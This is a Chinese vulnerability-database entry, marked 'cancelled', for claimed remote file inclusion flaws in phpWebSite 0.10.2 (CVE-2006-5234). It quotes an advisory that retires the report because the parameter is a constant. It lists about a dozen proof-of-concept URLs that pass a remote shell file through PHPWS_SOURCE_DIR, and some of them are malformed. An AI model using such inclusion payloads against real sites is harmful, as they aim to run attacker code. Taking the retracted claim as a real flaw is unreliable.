已注销:PHPWebSite 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111215 漏洞类型 输入验证
发布时间 2006-10-09 更新时间 2006-10-16
CVE编号 CVE-2006-5234 CNNVD-ID CNNVD-200610-100
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28774
https://cxsecurity.com/issue/WLB-2006100080
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-100
|漏洞详情
phpWebSite0.10.2中的多个PHP远程文件包含漏洞,远程攻击者可以通过(1)init.php,(2)users.php,(3)Cookie.php,(4)forms.php,(5)Groups.php,(6)ModSetting.php,(7)Calendar.php,(8)DateTime.php,(9)core.php,(10)ImgLibrary.php,(11)Manager.php,and(12)Template.php和(13)EZform.php的PHPWS_SOURCE_DIR参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20412/info

phpWebSite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.

phpWebSite version 0.10.2 is vulnerable to this issue; other versions may also be affected.

This BID is being retired. The 'PHPWS_SOURCE_DIR' is a constant and not an attacker-controlled variable.

http://www.example.com/mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/Cookie.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/forms.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/Groups.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/http://www.example.com/modSetting.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Calendar.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/DateTime.php?PHPWS_HOME_DIR=http://Shel3ll.txt?
http://www.example.com/core/http://www.example.com/core.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/ImgLibrary.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Manager.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Template.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/EZform.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
|参考资料

来源:BID
名称:20412
链接:http://www.securityfocus.com/bid/20412
来源:BUGTRAQ
名称:20061009phpWebSite0.10.2RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/448098/100/0/threaded
来源:VIM
名称:20061010phpWebSite0.10.2RFI-CVEdispute
链接:http://www.attrition.org/pipermail/vim/2006-October/001079.html
来源:BUGTRAQ
名称:20061011Re:phpWebSite0.10.2RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/448307/100/100/threaded
来源:SREASON
名称:1716
链接:http://securityreason.com/securityalert/1716